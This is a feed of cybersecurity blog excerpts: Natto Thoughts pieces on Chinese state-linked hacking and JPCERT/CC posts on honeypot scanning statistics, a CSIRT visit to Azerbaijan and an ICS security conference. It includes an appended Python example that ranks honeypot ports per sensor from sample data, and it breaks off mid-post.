    <figure><img src="https://substackcdn.com/image/fetch/$s_!ctsD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png" width="1456" height="971" alt=""><figcaption class="image-caption">Source: ChatGPT image</figcaption></figure><p>On August 27, 2025, the United States and 22 government agencies from 13 countries issued a <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Cybersecurity Advisory</a> entitled, “<strong>Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System</strong>.” The advisory outlined the tactics, techniques, and procedures (TTPs) employed by advanced persistent threat (APT) actors whose activity partially overlaps with activity grouped under names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor.</p><p>The document identified three Chinese companies—<strong>Sichuan Juxinhe Network Technology Co. Ltd.</strong> (四川聚信和网络科技有限公司), <strong>Beijing Huanyu Tianqiong Information Technology Co., Ltd.</strong> (北京寰宇天穹信息技术有限公司), and <strong>Sichuan Zhixin Ruijie Network Technology Co., Ltd.</strong> (四川智信锐捷网络科技有限公司)—that have supported these APT activities globally since at least 2021. These organizations reportedly supplied cyber-related products and services to China’s intelligence entities, including units within the People’s Liberat…</p> <p> <a href="https://www.nattothoughts.com/p/salt-typhoon-new-joint-advisory-offers"> Read more </a> </p>
  34. No Ranges, No Bounties, No Contests: Forging Offensive Capabilities in China’s 2000s Hacker Scene

    Wed, 27 Aug 2025 16:03:08 -0000

    China&#8217;s early hacking training grounds weren&#8217;t classrooms or hacking contests, but online forums, real-world targets, and freely shared offensive tools and vulnerabilities.
    <pre><code>This post is adapted from the Cyberdefense Report <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/before-vegas-cyberdefense-report.pdf">"Before Vegas: The &#8216;Red Hackers&#8217; Who Shaped China&#8217;s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</code></pre><p>In our <a href="https://nattothoughts.substack.com/p/few-and-far-between-during-chinas">last piece</a>, we showed how truly elite offensive cyber talent has always been scarce, even within China&#8217;s massive hacker communities of the 2000s. But how did this small circle of talent actually develop offensive capabilities? In China, these fall under the broader category of &#8220;live-fire&#8221; capabilities (&#23454;&#25112;&#33021;&#21147;),<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> i.e. the ability to apply tools and techniques such as penetration testing, security operations, and incident response. As we discussed <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">here</a>, <a href="https://nattothoughts.substack.com/p/business-priorities-of-chinese-cyber">here</a>, and <a href="https://nattothoughts.substack.com/p/butian-vulnerability-platform-forging">here</a>, hacking contests, bug bounty platforms, and cyber ranges have become core pillars of China&#8217;s modern live-fire talent pipeline. Today, these mechanisms are deeply institutionalized across universities, companies, and state-backed initiatives, serving as the backbone for identifying and training skilled operators.</p> <p> <a href="https://www.nattothoughts.com/p/no-ranges-no-bounties-no-contests"> Read more </a> </p>
  35. Few and Far Between: During China’s Red Hacker Era, Patriotic Hacktivism Was Widespread—Talent Was Not

    Wed, 13 Aug 2025 16:02:26 -0000

    Inside the small, elite circles that powered China&#8217;s massive hacker communities in the late 1990s and 2000s.
    <pre><code>This post is excerpted from the Cyberdefense Report <a href="https://css.ethz.ch/en/center/CSS-news/2025/07/before-vegas-the-red-hackers-who-shaped-chinas-cyber-ecosystem.html">"Before Vegas: The &#8216;Red Hackers&#8217; Who Shaped China&#8217;s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</code></pre><p>Truly elite offensive cyber talent has always been rare. Despite the growth of cybersecurity communities worldwide, and the emergence of extensive and structured talent pipelines in countries like China &#8211; examined in Natto pieces<a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking"> 1</a>,<a href="https://nattothoughts.substack.com/p/when-a-vocational-college-becomes"> 2</a> and<a href="https://nattothoughts.substack.com/p/debating-chinas-ai-path-alternative"> 3</a> &#8211; which have made high-quality talent more widely available, truly exceptional individuals remain scarce and highly sought after.</p><p>As early as 2013, the<a href="https://www.airuniversity.af.edu/CASI/Display/Article/2485204/plas-science-of-military-strategy-2013/"> Science of Military Strategy</a>&#8212;a foundational text published by the PLA Academy of Military Science&#8212;noted that while cyber warfare benefits from a &#8220;broad mass base,&#8221; the traditional Chinese military ideal of &#8220;all people are soldiers&#8221; does not translate to cyberspace. 
Instead, it emphasized that only an &#8220;<a href="https://www.bloomsburycollections.com/monograph-detail?docid=b-9798881817602&amp;pdfid=9798881817602.ch-8.pdf&amp;tocid=b-9798881817602-chapter8">extremely lean</a>&#8221; cohort possessed the capabilities required for high-level cyber operations.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a></p><p>&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/few-and-far-between-during-chinas"> Read more </a> </p>
  36. When Privileged Access Falls into the Wrong Hands: Chinese Companies in Microsoft’s MAPP Program

    Thu, 31 Jul 2025 16:32:47 -0000

    Chinese companies face conflicting pressures between MAPP&#8217;s non-disclosure requirements and domestic policies that incentivize or mandate vulnerability disclosure to the state.
    <p>On July 25, 2025, Bloomberg <a href="https://www.bloomberg.com/news/articles/2025-07-25/microsoft-sharepoint-hack-probe-on-whether-chinese-hackers-found-flaw-via-alert?srnd=undefined">reported </a>that Microsoft is investigating whether a leak from its Microsoft Active Protections Program (MAPP) allowed Chinese hackers to exploit a SharePoint vulnerability before a patch was released. Microsoft attributed the campaign &#8211; dubbed &#8220;ToolShell&#8221; after the custom remote access trojan used &#8211; to three China-linked threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The attackers reportedly compromised over 400 organizations worldwide, including the U.S. National Nuclear Security Administration.</p><p>Launched in 2008, MAPP is designed to reduce the time between the discovery of a vulnerability and the deployment of patches. By giving trusted security vendors early access to technical details about upcoming patches, Microsoft enables them to release protections (such as antivirus signatures and intrusion detection rules) in sync with its monthly updates. The program, however, relies on strict compliance with non-disclosure agreements and the secure &#8230;</p> <p> <a href="https://www.nattothoughts.com/p/when-privileged-access-falls-into"> Read more </a> </p>
  37. HAFNIUM-Linked Hacker Xu Zewei: Riding the Tides of China’s Cyber Ecosystem

    Wed, 23 Jul 2025 16:01:48 -0000

    How one man&#8217;s career reveals the interconnected web of China&#8217;s state security apparatus, cybersecurity firms, and strategic industries
    <p>On July 3, 2025, at Milan Malpensa Airport, <a href="https://www.ansa.it/english/newswire/english_service/2025/07/07/ansachinese-spy-arrested-in-italy-on-us-warrant_9f5bbfe6-74ef-4f78-bb1e-fcf01f755652.html">Italian police arrested</a> <strong>Xu Zewei</strong> (<strong>&#24464;&#27901;&#20255;</strong>), whom U.S. authorities allege to be a hacker contracted by the Chinese state. Following the news about Xu&#8217;s arrest from Italian media, on July 8, the U.S. Department of Justice (US DoJ) issued a <a href="https://www.justice.gov/opa/pr/justice-department-announces-arrest-prolific-chinese-state-sponsored-contract-hacker">press release</a> and unsealed an <a href="https://www.justice.gov/opa/media/1407196/dl">indictment</a>, accusing Xu Zewei and his co-defendant <strong>Zhang Yu</strong> (<strong>&#24352;&#23431;</strong>) of participating in hacking activities between February 2020 and June 2021. These activities were reportedly linked to the Advanced Persistent Threat (APT) group <strong><a href="https://attack.mitre.org/groups/G0125/">HAFNIUM</a></strong> (also known as Silk Typhoon or APT27), involving the theft of COVID-19 research from universities, exploitation of Microsoft Exchange Server vulnerabilities, and compromising thousands of computers worldwide, including those in the United States. As of this writing, Xu remains in custody near Milan and is undergoing extradition proceedings to the United States. During his initial court appearance, <a href="https://www.cnn.com/2025/07/08/politics/us-extradition-chinese-man-accused-hacking-covid-research">Xu asserted</a> that he &#8220;has nothing to do with the case,&#8221; &#8230;</p> <p> <a href="https://www.nattothoughts.com/p/hafnium-linked-hacker-xu-zewei-riding"> Read more </a> </p>
  38. Pick Your Innovation Path in AI: Chinese Edition

    Wed, 09 Jul 2025 16:01:31 -0000

    China&#8217;s advances in AI show the effects of a state approach of &#8220;introduce, digest, absorb, re-innovate&#8221; and years of debate on the balance between market-driven innovation and state-led development
    <p><em>When the Chinese start-up <a href="https://api-docs.deepseek.com/news/news1210">DeepSeek launched</a> its artificial intelligence (AI) chatbot in December 2024, many Americans suddenly realized that <a href="https://www.nytimes.com/2025/05/19/opinion/china-us-trade-tariffs.html">China could compete in AI.</a> News of this breakthrough sparked debate on whether <a href="https://www.wired.com/story/stanford-study-global-artificial-intelligence-index/">China could win the AI race</a> and <a href="https://www.economist.com/china/2025/05/25/xi-jinpings-plan-to-overtake-america-in-ai">surpass the dominance</a> of the United States in AI and on <a href="https://www.foreignaffairs.com/united-states/what-if-china-wins-ai-race">the implications if China were to succeed.</a> In April 2025, Chinese President Xi Jinping delivered <a href="https://cset.georgetown.edu/publication/xi-politburo-collective-study-ai-2025/">remarks</a> on artificial intelligence during a Politburo study session on AI, Xi&#8217;s first pronouncement on the subject since 2018. &#8220;Persist in Being Self-Reliant, Be Strongly Oriented Toward Applications, and Push the Orderly Development of Artificial Intelligence,&#8221; was Xi&#8217;s main message, according to a Chinese state media summary of his speech. <a href="https://digichina.substack.com/p/xis-ai-message-to-the-politburo-analyzed">Experts suggested</a> that Xi&#8217;s comments signaled China&#8217;s determination to achieve AI supremacy. China has come a long way since the release of the State Council&#8217;s <a href="https://www.newamerica.org/cybersecurity-initiative/digichina/blog/full-translation-chinas-new-generation-artificial-intelligence-development-plan-2017/">New Generation Artificial Intelligence Development Plan</a> in 2017. Back then, Chinese schola&#8230;</em></p> <p> <a href="https://www.nattothoughts.com/p/debating-chinas-ai-path-alternative"> Read more </a> </p>
  39. TSUBAME Report Overflow (July to September 2025)

    Mon, 30 Mar 2026 05:00:00 -0000

    Introduction: This blog, "TSUBAME Report Overflow," accompanies the quarterly...
    <h3>はじめに</h3> <p>このブログ「TSUBAMEレポート Overflow」では、四半期ごとに公表している「インターネット定点観測レポート」の公開にあわせて、レポートには記述していない海外に設置しているセンサーの観測動向の比較や、その他の活動などをまとめて取り上げていきます。今回は、TSUBAME(インターネット定点観測システム)における2025年7~9月の観測結果についてご紹介します。</p> <h3>国内のNVR製品等、複数の機器が決まったポート番号で待ち受けているIPアドレスからの不審なパケットについて</h3> <p>「インターネット定点観測レポート」では「マルウェアに感染したとみられるTP-Link製ルーターからのパケットの観測結果について」として、国内を送信元とするノードのうち、TP-Link製ルーターに関する事例を紹介しました。 しかしながら、ハニーポットではそれ以外の製品から送信されたパケットについても観測されています。 送信元IPアドレスによっては、複数のポートがオープンとなっているケースも確認されています。このような場合、そのIPアドレスに設置されているルーターによってポートフォワーディングが設定され、複数の製品が単一のIPアドレス上で同居して動作していると考えられます。 このような構成自体は珍しいものではありませんが、外部からの観測だけでは、どの製品が侵害を受けているのかを判別することは困難です。 今回は、このように複数の製品が組み合わさって稼働しているIPアドレスの中で、特に気になる事象が確認されましたので紹介します。 個々のIPアドレスで観測された特徴を箇条書きでまとめると、次のとおりです。</p> <ul> <li>NVR製品のログイン画面が確認できる</li> <li>国内メーカー製の業務用ルーターの管理画面が確認できる</li> <li>SDNコントローラーのログイン画面が確認できる</li> </ul> <p>今回の事象の大きな特徴として、これらの製品それぞれのWeb UIが、異なるIPアドレスであっても同じポート番号で待ち受けている点が挙げられます。 また、国内メーカー製ルーターの管理画面には、都道府県名と推測される略称の文字列が記載されており、複数の地域で稼働している可能性が示唆されました。 これらの点から、システム部門、あるいは導入を担当したSI/NIerが、同一設定でキッティングを行った可能性が考えられます。 不審なパケットが観測されていることから、いずれかの機器が侵害を受けている可能性が高いと考えられます。現在、これらの機器を設置しているユーザーへのコンタクトを試みていますが、現時点では成功していません。 本記事をご覧になり、心当たりのある方がいらっしゃいましたら、当方までご連絡いただければ幸いです。</p> <h3>国内外の観測動向の比較</h3> <p>図1は、国内外のセンサー1台が1日あたりに受信したパケット数の平均を月ごとに比較したものです。国内のセンサーよりも海外のセンサーで多くのパケットを観測しています。また、国内のセンサーは月を追うごとに徐々に観測数が減少していますが、海外のセンサーについては8月に減少したものの、9月は増加に転じました。</p> <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/of_fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/of_fig1.png" width="1155" height="573" alt="" class="asset asset-image at-xid-3981298" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図1:月ごとの国内外センサー平均パケット数の比較</td> </tr> </tbody> </table> <h3>センサーごとの観測動向の比較</h3> 
<p>Each sensor is assigned one global IP address. To see whether observations differ between the sensors in Japan, North America, Europe and other regions, Table 1 summarises the top 10 packets received by each. The rankings differ from sensor to sensor, but 22/TCP, 23/TCP, 80/TCP, 443/TCP, 8080/TCP and so on were observed by almost every sensor, which suggests that scanning is being carried out across a wide range of networks.</p> <p style="text-align: center;">Table 1: Comparison of the top 10 packets per domestic and overseas sensor</p> <table> <thead> <tr> <th></th> <th>Japan sensor 1</th> <th>Japan sensor 2</th> <th>North America sensor 1</th> <th>North America sensor 2</th> <th>Europe sensor 1</th> <th>Europe sensor 2</th> <th>Other region sensor 1</th> <th>Other region sensor 2</th> </tr> </thead> <tbody> <tr> <td>1st</td><td>23/TCP</td><td>23/TCP</td><td>80/TCP</td><td>23/TCP</td><td>23/TCP</td><td>ICMP</td><td>ICMP</td><td>22/TCP</td> </tr> <tr> <td>2nd</td><td>80/TCP</td><td>80/TCP</td><td>ICMP</td><td>22/TCP</td><td>443/TCP</td><td>443/TCP</td><td>23/TCP</td><td>23/TCP</td> </tr> <tr> <td>3rd</td><td>3389/TCP</td><td>443/TCP</td><td>443/TCP</td><td>3389/TCP</td><td>443/TCP</td><td>80/TCP</td><td>22/TCP</td><td>ICMP</td> </tr> <tr> <td>4th</td><td>22/TCP</td><td>8080/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td> </tr> <tr> <td>5th</td><td>ICMP</td><td>8888/TCP</td><td>22/TCP</td><td>443/TCP</td><td>22/TCP</td><td>22/TCP</td><td>443/TCP</td><td>443/TCP</td> </tr> <tr> <td>6th</td><td>8080/TCP</td><td>22/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td> </tr> <tr> <td>7th</td><td>443/TCP</td><td>3389/TCP</td><td>3389/TCP</td><td>8080/TCP</td><td>3389/TCP</td><td>3389/TCP</td><td>3389/TCP</td><td>3389/TCP</td> </tr> <tr> <td>8th</td><td>5555/TCP</td><td>ICMP</td><td>8080/TCP</td><td>ICMP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td> </tr> <tr> <td>9th</td><td>34567/TCP</td><td>8728/TCP</td><td>8443/TCP</td><td>445/TCP</td><td>8443/TCP</td><td>8443/TCP</td><td>6379/TCP</td><td>8443/TCP</td> </tr> <tr> 
<td>10th</td><td>60000/TCP</td><td>5555/TCP</td><td>6379/TCP</td><td>8081/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>2222/TCP</td><td>2222/TCP</td> </tr> </tbody> </table> <h3>Closing</h3> <p>Observing from multiple locations makes it possible to judge whether a fluctuation is occurring only in one particular network. This quarter did not call for a special alert or extra edition, but the presence of scanners still warrants attention. We plan to keep publishing this blog regularly alongside each report, and to issue extra editions when unusual changes occur. We also welcome your opinions and feedback; if there are items you would like us to dig into or topics you would like covered, please send them via the contact form. Thank you for reading to the end.</p> <p style="text-align: right">鹿野 恵祐, Cyber Metrics Group</p> <p>TSUBAME Report Overflow (July to September 2025)</p>
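As an added example that is not part of the TSUBAME report, the following Python reproduces the kind of per-sensor ranking shown in Table 1 from raw packet records, then separates the services every sensor saw (the hint of wide-area scanning the text draws from the table) from the ones seen by a single sensor only, which are the candidates for a regional or sensor-specific cause. The sensor names and the packet records are constructed sample data.

```python
"""Per-sensor top-N ranking of destination ports, plus the split between
services every sensor saw (Internet-wide scanning) and region-only ones."""
from collections import Counter, defaultdict

# Constructed sample: one tuple per received packet (sensor, protocol, dst port).
# ICMP has no port, so it is keyed simply as "ICMP"; TCP/UDP as "<port>/<PROTO>".
SAMPLE_PACKETS = [
    ("jp-1", "TCP", 23), ("jp-1", "TCP", 23), ("jp-1", "TCP", 80),
    ("jp-1", "TCP", 3389), ("jp-1", "TCP", 34567), ("jp-1", "ICMP", None),
    ("na-1", "TCP", 80), ("na-1", "TCP", 80), ("na-1", "ICMP", None),
    ("na-1", "TCP", 23), ("na-1", "TCP", 8728), ("na-1", "TCP", 6379),
    ("eu-1", "ICMP", None), ("eu-1", "TCP", 443), ("eu-1", "TCP", 23),
    ("eu-1", "TCP", 80), ("eu-1", "TCP", 8728), ("eu-1", "TCP", 6379),
]


def service_key(proto, port):
    """Normalise a (protocol, port) pair into the label style used in Table 1."""
    return "ICMP" if proto == "ICMP" else f"{port}/{proto}"


def rank_per_sensor(packets, top_n=10):
    """Return {sensor: [(label, count), ...]}, most frequent first,
    ties broken by label so the output is deterministic."""
    counts = defaultdict(Counter)
    for sensor, proto, port in packets:
        counts[sensor][service_key(proto, port)] += 1
    return {
        sensor: sorted(c.items(), key=lambda kv: (-kv[1], kv[0]))[:top_n]
        for sensor, c in counts.items()
    }


def common_and_unique(ranking):
    """Split the ranked labels into those present in every sensor's list
    (likely broad scanning) and those seen by exactly one sensor
    (worth checking for a regional or sensor-specific cause)."""
    per_sensor = {s: {label for label, _ in lst} for s, lst in ranking.items()}
    common = set.intersection(*per_sensor.values()) if per_sensor else set()
    seen_by = Counter(label for labels in per_sensor.values() for label in labels)
    unique = {s: {lab for lab in labels if seen_by[lab] == 1}
              for s, labels in per_sensor.items()}
    return common, unique


if __name__ == "__main__":
    ranking = rank_per_sensor(SAMPLE_PACKETS)
    for sensor, lst in ranking.items():
        print(sensor, ", ".join(f"{label} ({n})" for label, n in lst))
    common, unique = common_and_unique(ranking)
    print("seen by every sensor:", sorted(common))
    print("seen by one sensor only:", {s: sorted(u) for s, u in unique.items()})
```

With real sensor logs the loader would feed (sensor, protocol, port) tuples from the capture; everything else stays the same, and the "unique" set is where a case like the NVR/router/SDN-controller cluster above would surface before any manual look at the source addresses.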
  40. From the CSIRTs of the World: Azerbaijan

    Wed, 25 Mar 2026 06:00:00 -0000

    From the CSIRTs of the World vol.6. Hello, this is 米澤 from the Global Coordination Division. In early March I travelled to Azer...
    <h3>From the CSIRTs of the World vol.6</h3> <p>Hello, this is 米澤 from the Global Coordination Division. In early March I travelled to Baku, the capital of Azerbaijan, and had the opportunity to visit five related organisations, including CSIRTs and a training facility. This article gives an overview of those visits.</p> <h3>Azerbaijan, the Land of Fire, and Baku, the City of Winds</h3> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093016 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ01-320wri.jpg" alt="" width="450" height="338"><figcaption>Central Baku and the Caspian Sea</figcaption> </figure></p> <p>Azerbaijan lies in the Caucasus region between the Caspian Sea and the Black Sea. It has abundant natural resources such as natural gas and oil, and because of Yanar Dag, a hillside where natural gas seeping from the ground burns continuously, it is also known as the "Land of Fire".</p> <p>Its capital, Baku, faces the Caspian Sea and left a strong impression as a city where the medieval old town coexists with futuristic buildings that reflect its economic development. Baku is said to mean "city of winds" in Persian, and true to the name, we could feel the strong wind blowing in off the Caspian Sea.</p> <h3>Azerbaijan's CSIRTs</h3> <p>In Azerbaijan, CSIRTs are established per sector, covering government, the domestic Internet, and the research and education network, and each handles cybersecurity response according to its role. Specifically, there are three CSIRTs: CERT.AZ<a href="#01">[1]</a>, CERT.GOV.AZ<a href="#02">[2]</a> and AzScienceCERT<a href="#03">[3]</a>. These organisations work to strengthen the national cybersecurity posture through awareness raising and incident response.</p> <p>We had previously worked with CERT.AZ and CERT.GOV.AZ, both FIRST members, at international conferences and workshops, but this was our first exchange with AzScienceCERT. A brief outline of each CSIRT follows.</p> <h4>CERT.AZ</h4> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093033 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ02-640wri.jpg" alt="" width="450" height="338"><figcaption>Group photo with the CERT.AZ team</figcaption> </figure></p> <p>CERT.AZ is a CSIRT established in 2012 and operated by the Electronic Security Service under the Ministry of Digital Development and Transport, which is responsible for ICT policy, digital government, telecommunications infrastructure and transport infrastructure.</p> <p>It mainly coordinates with and among domestic information infrastructure stakeholders, provides incident response support to private organisations and the general public, collects and analyses threat information, and raises awareness of security measures. In responding to cyber threats it places emphasis on information sharing in order to deal with threats that cross national borders, not only domestic ones, and it expressed a wish to further strengthen information sharing with international partners, including Japan.</p> 
<p>CERT.AZ is also active in awareness raising: in addition to TV commercials and podcasts, it explained that it issues alert messages on the platform of "myGov", Azerbaijan's digital ID app.</p> <p>We had held an online workshop with CERT.AZ in August 2025 to share our respective activities and situations, but visiting in person made me feel that an emergency response between us would now go more smoothly. CERT.AZ has also attended JSAC, the conference hosted by JPCERT/CC, and we interact in a variety of settings.</p> <h4>CERT.GOV.AZ</h4> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093037" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ03-640wri.jpg" alt="" width="450" height="338"><figcaption>Group photo with SCISSS and the CERT.GOV.AZ team</figcaption> </figure></p> <p>CERT.GOV.AZ is a government CSIRT established under the State Service for Special Communication and Information Security (SCISSS), one of the national security agencies. It was founded in 2008.</p> <p>It mainly covers government agency networks, detecting and preventing cyber attacks, monitoring the security of government networks, and supporting incident response. It runs a 24/7 security operations centre (SOC) and also has dedicated teams for digital forensics and malware analysis. To raise cybersecurity awareness it operates, separately from its official site, a website dedicated to publishing threat information, where it releases threat analysis reports and malware analysis tools developed in house.</p> <p>For cases under investigation that may affect other countries it notifies its overseas counterparts, and we confirmed that we will continue to cooperate through threat information sharing and other means.</p> <h4>AzScienceCERT</h4> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093040" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ04-640wri.jpg" alt="" width="450" height="338"><figcaption>Group photo with the Institute of Information Technology and the AzScienceCERT team</figcaption> </figure></p> <p>AzScienceCERT is a CSIRT operating under the Institute of Information Technology of the Azerbaijan National Academy of Sciences (ANAS). Established in 2011, it provides information security risk management and incident response support to the universities, research institutes and educational institutions that use AzScienceNet, the research and education network.</p> <p>The Institute of Information Technology hosts the AzScienceNet data centre, a research centre for information technology and cybersecurity, and an operations centre for network operation and monitoring. As a research institution it conducts research and holds conferences on scientific and practical issues in fields such as software engineering and digital forensics, and expressed interest in international exchange in these areas.</p> <h3>Organisations supporting workforce development and private-sector capacity building</h3> 
<p>Beyond its CSIRTs, Azerbaijan is active in developing cybersecurity talent and supporting capacity building in the private sector. On this trip we visited the following two related organisations.</p> <h4>Azerbaijan Cybersecurity Center</h4> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093042" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ05-640wri.jpg" alt="" width="450" height="338"><figcaption>Touring the facility</figcaption> </figure></p> <p>The Center<a href="#04">[4]</a> is a national-scale education and training hub for developing cybersecurity talent in Azerbaijan. It was established in 2023 under the leadership of the Ministry of Digital Development and Transport and the Innovation and Digital Development Agency. Technion (the Israel Institute of Technology) serves as its international education partner, supporting it with training curricula and visiting instructors.</p> <p>What sets the Center's training programme apart from academic university education is that it builds practical skills over a longer period of six months to a year, for example through hands-on training based on real cyber attack and defence scenarios.</p> <p>Applicants must pass a selection examination; the requirements are being at least 17 years old (with no upper age limit) and having advanced English and basic IT skills. Around 2,000 people apply for 60 places, so competition is very intense. Another reason for its popularity is that students of partner universities can have their activities at the Center recognised as credits towards graduation.</p> <p>So far 480 students have completed the Center's training programme, and 86% of them have found employment in the cybersecurity industry. The many career-related opportunities, such as internship programmes with companies and networking events with alumni, were given as one reason for this high employment rate. During our visit we were shown around the facility and were also able to meet the highly motivated students.</p> <p>Alongside such workforce development, Azerbaijan also supports the development of its cybersecurity sector by building networks of private companies and professionals.</p> <h4>Association of Cybersecurity Organizations of Azerbaijan (AKTA)</h4> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093051" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ06-640wri.jpg" alt="" width="450" height="338"><figcaption>Meeting with the AKTA team</figcaption> </figure></p> <p>The Association<a href="#05">[5]</a>, established in 2022, is a non-profit private body that brings together cybersecurity companies, organisations and professionals in Azerbaijan. Acting as a platform connecting companies and experts in the domestic cybersecurity sector, it aims to strengthen Azerbaijan's cybersecurity capability and shape its ecosystem by reinforcing the cybersecurity environment, developing talent, providing education and awareness, promoting public-private cooperation, and advancing information sharing and joint activities.</p> 
<p>It currently has around 60 corporate members, including cybersecurity companies, IT firms, telecommunications carriers and educational institutions. A current challenge raised was that while security measures have progressed in critical infrastructure sectors, they have not progressed sufficiently among small and medium-sized enterprises, and the activities of a private body like this appear to play an important role in addressing that.</p> <p>The Association also works on building international networks in education and industry through exchanges with companies and professionals in Turkey, Kazakhstan, Uzbekistan and elsewhere. It hosts an international event called the National Cybersecurity Forum, with talks and discussions on themes such as critical infrastructure protection, international cooperation, capacity building and cyber diplomacy, and asked us to consider participation by speakers from Japan.</p> <h3>Closing</h3> <p>As digitalisation progresses, Azerbaijan is strengthening its cybersecurity posture at the national level. In 2023 it adopted the "Information Security and Cybersecurity Strategy (2023-2027)", which sets out protection of critical information infrastructure, stronger capability to respond to cyber threats, workforce development and promotion of international cooperation as priority areas. Through this visit we saw that government agencies, private companies and research institutions each play their part while cooperating with one another to improve cybersecurity capability across the country as a whole.</p> <p>The people we met were also full of positive energy to further strengthen cybersecurity initiatives and international cooperation, which mirrored the atmosphere of the fast-developing city of Baku and was a great stimulus for us as well. We intend to keep deepening cooperation with CSIRTs in each country through exchanges like this, and to expand information sharing and cooperative relationships, centred on responding to cross-border incidents and threats.</p> <p style="text-align: right">米澤 詩歩乃, Global Coordination Division</p> <h2>References</h2> <p><a name="01">[1]</a> CERT.AZ<br> <a href="https://cert.az/">https://cert.az/</a></p> <p><a name="02">[2]</a> CERT.GOV.AZ<br> <a href="https://cert.gov.az/">https://cert.gov.az/</a></p> <p><a name="03">[3]</a> AzScienceCERT<br> <a href="https://azsciencenet.az/az/service/3">https://azsciencenet.az/az/service/3</a></p> <p><a name="04">[4]</a> Azerbaijan Cybersecurity Center<br> <a href="https://www.akm.az/">https://www.akm.az/</a></p> <p><a name="05">[5]</a> Association of Cybersecurity Organizations of Azerbaijan<br> <a href="https://akta.az/en">https://akta.az/en</a></p>
  41. Control System Security Conference 2026: Event Report

    Tue, 24 Mar 2026 02:00:00 -0000

    On 10 February 2026, JPCERT/CC held the Control System Security Conferen...
    <p>On 10 February 2026, JPCERT/CC held the <a href="https://www.jpcert.or.jp/event/ics-conference2026.html" target="_blank" rel="noopener">Control System Security Conference 2026</a>. The conference shares the current state of threats to control systems in Japan and abroad and the initiatives of control system security stakeholders, with the aim of helping participants improve their control system security measures and establish best practices. It has been held every year since 2009, and this was the 18th edition.</p> <p>This year it was held in person only, and 137 people attended (216 registrations). In JPCERT/CC Eyes we introduce the opening and closing remarks and the six presentations. Apart from the panel session, the talks are available on YouTube; links are given in the text, so please take a look.</p> <h3>Opening remarks</h3> <p><strong>橋本 勝国, Director for Planning, Cybersecurity Division, Commerce and Information Policy Bureau, Ministry of Economy, Trade and Industry (METI)<br></strong><a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_00_MINISTRY_OF_ECONOMY_TRADE_AND_INDUSTRY.pdf" target="_blank" rel="noopener">Slides</a><br><a href="https://www.youtube.com/watch?v=7-SuRR2fqVo" target="_blank" rel="noopener">YouTube</a><br><br>The opening remarks were given by 橋本, Director for Planning at the Cybersecurity Division of METI's Commerce and Information Policy Bureau.</p> <p>Drawing on the IPA's "10 Major Security Threats 2026" and other sources, 橋本 noted that ransomware remains a major threat and that damage is spreading, particularly in manufacturing.</p> <p>He also outlined the latest Japanese policy developments: building the SCS evaluation scheme to raise the baseline of measures across the supply chain, formulating OT security guidelines for semiconductor device factories, the launch of JC-STAR and the move to make it a government procurement requirement, and Japan's signing of the international joint guidance on SBOM.</p> <p>He closed by stressing that, following the enactment of the Act on Strengthening Cyber Response Capabilities, Japan needs to build an active cyber defence posture through public-private cooperation to protect its industrial base and people's lives, and that it is important to steadily advance effective initiatives across society as a whole.<br><br><img class="asset asset-image at-xid-4071768" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_opening-640wri.png" alt="" width="640" height="360"></p> <h3>Control System Security: Present State and Outlook, Looking Back on the Past Year</h3> <p><strong>Speaker:<br>宮地 利雄, Technical Advisor, JPCERT Coordination Center</strong><br><a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_01_JPCERTCC.pdf" 